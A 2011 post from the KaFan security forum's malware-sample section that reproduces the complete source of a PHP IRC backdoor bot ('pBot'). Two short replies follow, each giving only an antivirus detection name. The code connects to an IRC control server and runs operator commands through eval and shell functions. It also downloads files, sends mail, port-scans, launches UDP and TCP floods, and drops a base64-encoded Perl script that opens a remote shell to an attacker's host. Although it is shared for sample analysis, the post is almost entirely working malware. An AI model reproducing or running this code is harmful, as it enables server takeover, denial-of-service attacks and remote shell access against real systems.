收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://www.informatik-lehren.de/menue.txt
返回列表 发新帖
查看: 1485|回复: 2
收起左侧

[其它] http://www.informatik-lehren.de/menue.txt

 关闭 [复制链接]
是昔流芳
发表于 2011-7-19 08:21:45 | 显示全部楼层 |阅读模式
  1. <?

  3. set_time_limit(0);
  4. error_reporting(0);
  5. echo "ok!";

  7. class pBot
  8. {
  9. var $config = array("server"=>"irc.ddosed.net",
  10.                      "port"=>"6667",
  11.                      "pass"=>"",
  12.                      "prefix"=>"test1",
  13.                      "maxrand"=>"4",
  14.                      "chan"=>"#test22",
  15.                      "chan2"=>"",
  16.                      "key"=>"*",
  17.                      "modes"=>"+p-ix",
  18.                      "password"=>"renan",
  19.                      "trigger"=>".",
  20.                      "hostauth"=>"*" // * for any hostname (remember: /setvhost xdevil.org)
  21.                      );
  22. var $users = array();
  23. function start()
  24. {
  25.     if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
  26.        $this->start();
  27.     $ident = "stz";
  28.     $alph = range("a","z");
  29.     for($i=0;$i<$this->config['maxrand'];$i++)
  30.        $ident .= $alph[rand(0,25)];
  31.     if(strlen($this->config['pass'])>0)
  32.        $this->send("PASS ".$this->config['pass']);
  33.     $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
  34.     $this->set_nick();
  35.     $this->main();
  36. }
  37. function main()
  38. {
  39.     while(!feof($this->conn))
  40.     {
  41.        $this->buf = trim(fgets($this->conn,512));
  42.        $cmd = explode(" ",$this->buf);
  43.        if(substr($this->buf,0,6)=="PING :")
  44.        {
  45.           $this->send("PONG :".substr($this->buf,6));
  46.        }
  47.        if(isset($cmd[1]) && $cmd[1] =="001")
  48.        {
  49.           $this->send("MODE ".$this->nick." ".$this->config['modes']);
  50.           $this->join($this->config['chan'],$this->config['key']);


  53.           if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
  54.           else { $safemode = "off"; }
  55.           $uname = php_uname();
  56.           $this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
  57.           $this->privmsg($this->config['chan2'],"[\aff\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
  58.        }
  59.        if(isset($cmd[1]) && $cmd[1]=="433")
  60.        {
  61.           $this->set_nick();
  62.        }
  63.        if($this->buf != $old_buf)
  64.        {
  65.           $mcmd = array();
  66.           $msg = substr(strstr($this->buf," :"),2);
  67.           $msgcmd = explode(" ",$msg);
  68.           $nick = explode("!",$cmd[0]);
  69.           $vhost = explode("@",$nick[1]);
  70.           $vhost = $vhost[1];
  71.           $nick = substr($nick[0],1);
  72.           $host = $cmd[0];
  73.           if($msgcmd[0]==$this->nick)
  74.           {
  75.            for($i=0;$i<count($msgcmd);$i++)
  76.               $mcmd[$i] = $msgcmd[$i+1];
  77.           }
  78.           else
  79.           {
  80.            for($i=0;$i<count($msgcmd);$i++)
  81.               $mcmd[$i] = $msgcmd[$i];
  82.           }
  83.           if(count($cmd)>2)
  84.           {
  85.              switch($cmd[1])
  86.              {
  87.                 case "QUIT":
  88.                    if($this->is_logged_in($host))
  89.                    {
  90.                       $this->log_out($host);
  91.                    }
  92.                 break;
  93.                 case "PART":
  94.                    if($this->is_logged_in($host))
  95.                    {
  96.                       $this->log_out($host);
  97.                    }
  98.                 break;
  99.                 case "PRIVMSG":
  100.                    if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
  101.                    {
  102.                       if(substr($mcmd[0],0,1)==".")
  103.                       {
  104.                          switch(substr($mcmd[0],1))
  105.                          {
  106.                             case "user":
  107.                               if($mcmd[1]==$this->config['password'])
  108.                               {
  109.                                  $this->log_in($host);
  110.                               }
  111.                               else
  112.                               {
  113.                                  $this->notice($this->config['chan'],"[\2Auth\2]: Senha errada $nick idiota!!");
  114.                               }
  115.                             break;
  116.                          }
  117.                       }
  118.                    }
  119.                    elseif($this->is_logged_in($host))
  120.                    {
  121.                       if(substr($mcmd[0],0,1)==".")
  122.                       {
  123.                          switch(substr($mcmd[0],1))
  124.                          {
  125.                             case "restart":
  126.                                $this->send("QUIT :restart commando from $nick");
  127.                                fclose($this->conn);
  128.                                $this->start();
  129.                             break;
  130.                             case "mail": //mail to from subject message
  131.                                if(count($mcmd)>4)
  132.                                {
  133.                                   $header = "From: <".$mcmd[2].">";
  134.                                   if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
  135.                                   {
  136.                                      $this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
  137.                                   }
  138.                                   else
  139.                                   {
  140.                                      $this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
  141.                                   }
  142.                                }
  143.                             break;
  144.                             case "safe":
  145.                                if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  146.                                {
  147.                                $safemode = "on";
  148.                                }
  149.                                else {
  150.                                $safemode = "off";
  151.                                }
  152.                                $this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
  153.                             break;
  154.                             case "inbox": //teste inbox
  155.                                if(isset($mcmd[1]))
  156.                                {
  157.                                   $token = md5(uniqid(rand(), true));
  158.                                   $header = "From: <inbox".$token."@xdevil.org>";
  159.                                   $a = php_uname();
  160.                                   $b = getenv("SERVER_SOFTWARE");
  161.                                   $c = gethostbyname($_SERVER["HTTP_HOST"]);
  162.                                   if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <admin@xdevil.org>",$header))
  163.                                   {
  164.                                      $this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
  165.                                   }
  166.                                   else
  167.                                   {
  168.                                      $this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
  169.                                   }
  170.                                }
  171.                             break;
  172.                             case "conback":
  173.                                if(count($mcmd)>2)
  174.                                {
  175.                                   $this->conback($mcmd[1],$mcmd[2]);
  176.                                }
  177.                             break;
  178.                             case "dns":
  179.                                if(isset($mcmd[1]))
  180.                                {
  181.                                   $ip = explode(".",$mcmd[1]);
  182.                                   if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
  183.                                   {
  184.                                      $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
  185.                                   }
  186.                                   else
  187.                                   {
  188.                                      $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
  189.                                   }
  190.                                }
  191.                             break;
  192.                             case "aff":
  193.                             case "aff":
  194.                                if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
  195.                                else { $safemode = "off"; }
  196.                                $uname = php_uname();
  197.                                $this->privmsg($this->config['chan'],"[\2aff\2]: $uname (safe: $safemode)");
  198.                                $this->privmsg($this->config['chan'],"[\2aff\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
  199.                             break;
  200.                             case "bot":
  201.                                $this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; #crew@corp.");
  202.                             break;
  203.                             case "uname":
  204.                                if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
  205.                                else { $safemode = "off"; }
  206.                                $uname = php_uname();
  207.                                $this->privmsg($this->config['chan'],"[\2aff\2]: $uname (safe: $safemode)");
  208.                             break;
  209.                             case "rndnick":
  210.                                $this->set_nick();
  211.                             break;
  212.                             case "raw":
  213.                                $this->send(strstr($msg,$mcmd[1]));
  214.                             break;
  215.                             case "eval":
  216.                               $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
  217.                             break;
  218.                                         case "sexec":
  219.                                $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
  220.                                $exec = shell_exec($command);
  221.                                $ret = explode("\n",$exec);
  222.                                for($i=0;$i<count($ret);$i++)
  223.                                   if($ret[$i]!=NULL)
  224.                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
  225.                             break;

  227.                             case "exec":
  228.                                $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
  229.                                $exec = exec($command);
  230.                                $ret = explode("\n",$exec);
  231.                                for($i=0;$i<count($ret);$i++)
  232.                                   if($ret[$i]!=NULL)
  233.                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
  234.                             break;

  236.                             case "passthru":
  237.                                $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
  238.                                $exec = passthru($command);
  239.                                $ret = explode("\n",$exec);
  240.                                for($i=0;$i<count($ret);$i++)
  241.                                   if($ret[$i]!=NULL)
  242.                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
  243.                             break;

  245.                             case "popen":
  246.                                if(isset($mcmd[1]))
  247.                                {
  248.                                   $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
  249.                                   $this->privmsg($this->config['chan'],"[\2popen\2]: $command");
  250.                                   $pipe = popen($command,"r");
  251.                                   while(!feof($pipe))
  252.                                   {
  253.                                      $pbuf = trim(fgets($pipe,512));
  254.                                      if($pbuf != NULL)
  255.                                         $this->privmsg($this->config['chan'],"     : $pbuf");
  256.                                   }
  257.                                   pclose($pipe);
  258.                                }  
  259.                           
  260.                             case "system":
  261.                                $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
  262.                                $exec = system($command);
  263.                                $ret = explode("\n",$exec);
  264.                                for($i=0;$i<count($ret);$i++)
  265.                                   if($ret[$i]!=NULL)
  266.                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
  267.                             break;


  270.                             case "pscan": // .pscan 127.0.0.1 6667
  271.                                if(count($mcmd) > 2)
  272.                                {
  273.                                   if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
  274.                                      $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
  275.                                   else
  276.                                      $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
  277.                                }
  278.                             break;
  279.                             case "ud.server": // .ud.server <server> <port> [password]
  280.                                if(count($mcmd)>2)
  281.                                {
  282.                                   $this->config['server'] = $mcmd[1];
  283.                                   $this->config['port'] = $mcmd[2];
  284.                                   if(isset($mcmcd[3]))
  285.                                   {
  286.                                    $this->config['pass'] = $mcmd[3];
  287.                                    $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
  288.                                   }
  289.                                   else
  290.                                   {
  291.                                      $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
  292.                                   }
  293.                                }
  294.                             break;
  295.                             case "download":
  296.                                if(count($mcmd) > 2)
  297.                                {
  298.                                   if(!$fp = fopen($mcmd[2],"w"))
  299.                                   {
  300.                                      $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
  301.                                   }
  302.                                   else
  303.                                   {
  304.                                      if(!$get = file($mcmd[1]))
  305.                                      {
  306.                                         $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
  307.                                      }
  308.                                      else
  309.                                      {
  310.                                         for($i=0;$i<=count($get);$i++)
  311.                                         {
  312.                                            fwrite($fp,$get[$i]);
  313.                                         }
  314.                                         $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
  315.                                      }
  316.                                      fclose($fp);
  317.                                   }
  318.                                }
  319.                                else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
  320.                             break;
  321.                             case "die":
  322.                                $this->send("QUIT :die command from $nick");
  323.                                fclose($this->conn);
  324.                                exit;
  325.                             case "logout":
  326.                                $this->log_out($host);
  327.                                $this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!");
  328.                             break;
  329.                             case "udpflood":
  330.                                if(count($mcmd)>3)
  331.                                {
  332.                                   $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
  333.                                }
  334.                             break;
  335.                             case "tcpflood":
  336.                                if(count($mcmd)>5)
  337.                                {
  338.                                   $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
  339.                                }
  340.                             break;
  341.                          }
  342.                       }
  343.                    }
  344.                 break;
  345.              }
  346.           }
  347.        }
  348.        $old_buf = $this->buf;
  349.     }
  350.     $this->start();
  351. }
  352. function send($msg)
  353. {
  354.     fwrite($this->conn,"$msg\r\n");

  356. }
  357. function join($chan,$key=NULL)
  358. {
  359.     $this->send("JOIN $chan $key");
  360. }
  361. function privmsg($to,$msg)
  362. {
  363.     $this->send("PRIVMSG $to :$msg");
  364. }
  365. function notice($to,$msg)
  366. {
  367.     $this->send("NOTICE $to :$msg");
  368. }
  369. function is_logged_in($host)
  370. {
  371.     if(isset($this->users[$host]))
  372.        return 1;
  373.     else
  374.        return 0;
  375. }
  376. function log_in($host)
  377. {
  378.     $this->users[$host] = true;
  379. }
  380. function log_out($host)
  381. {
  382.     unset($this->users[$host]);
  383. }
  384. function set_nick()
  385. {
  386.     if(isset($_SERVER['SERVER_SOFTWARE']))
  387.     {
  388.        if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
  389.           $this->nick = "[";
  390.        elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
  391.           $this->nick = "[";
  392.        elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
  393.           $this->nick = "[";
  394.        else
  395.           $this->nick = "[";
  396.     }
  397.     else
  398.     {
  399.        $this->nick = "[";
  400.     }
  401.     $this->nick .= $this->config['prefix'];
  402.     for($i=0;$i<$this->config['maxrand'];$i++)
  403.        $this->nick .= mt_rand(0,9);
  404.     $this->send("NICK ".$this->nick);
  405. }
  406.   function udpflood($host,$packetsize,$time) {
  407.         $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
  408.         $packet = "";
  409.         for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
  410.         $timei = time();
  411.         $i = 0;
  412.         while(time()-$timei < $time) {
  413.                 $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
  414.               fwrite($fp,$packet);
  415.                fclose($fp);
  416.                 $i++;
  417.         }
  418.         $env = $i * $packetsize;
  419.         $env = $env / 1048576;
  420.         $vel = $env / $time;
  421.         $vel = round($vel);
  422.         $env = round($env);
  423.         $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
  424. }
  425. function tcpflood($host,$packets,$packetsize,$port,$delay)
  426. {
  427.     $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
  428.     $packet = "";
  429.     for($i=0;$i<$packetsize;$i++)
  430.        $packet .= chr(mt_rand(1,256));
  431.     for($i=0;$i<$packets;$i++)
  432.     {
  433.        if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
  434.        {
  435.           $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
  436.           return 0;
  437.        }
  438.        else
  439.        {
  440.           fwrite($fp,$packet);
  441.           fclose($fp);
  442.        }
  443.        sleep($delay);
  444.     }
  445.     $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
  446. }
  447. function conback($ip,$port)
  448. {
  449.     $this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
  450.     $dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
  451.     if (is_writable("/tmp"))
  452.     {
  453.       if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
  454.       $fp=fopen("/tmp/dc.pl","w");
  455.       fwrite($fp,base64_decode($dc_source));
  456.       passthru("perl /tmp/dc.pl $ip $port &");
  457.       unlink("/tmp/dc.pl");
  458.     }
  459.     else
  460.     {
  461.     if (is_writable("/var/tmp"))
  462.     {
  463.       if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
  464.       $fp=fopen("/var/tmp/dc.pl","w");
  465.       fwrite($fp,base64_decode($dc_source));
  466.       passthru("perl /var/tmp/dc.pl $ip $port &");
  467.       unlink("/var/tmp/dc.pl");
  468.     }
  469.     if (is_writable("."))
  470.     {
  471.       if (file_exists("dc.pl")) { unlink("dc.pl"); }
  472.       $fp=fopen("dc.pl","w");
  473.       fwrite($fp,base64_decode($dc_source));
  474.       passthru("perl dc.pl $ip $port &");
  475.       unlink("dc.pl");
  476.     }
  477.     }
  478.   }
  479. }

  481. $bot = new pBot;
  482. $bot->start();

  484. ?>
复制代码
回复

举报

klinxun
发表于 2011-7-19 16:01:30 | 显示全部楼层
保存为txt文件时候趋势科技把它杀了,报BKDR_PHPBOT.SM
回复

举报

Palkia
发表于 2011-7-20 09:21:45 | 显示全部楼层
检测到威胁:

对象已感染病毒Backdoor.PHP.Pbot.a
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-1 06:42 , Processed in 0.122160 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表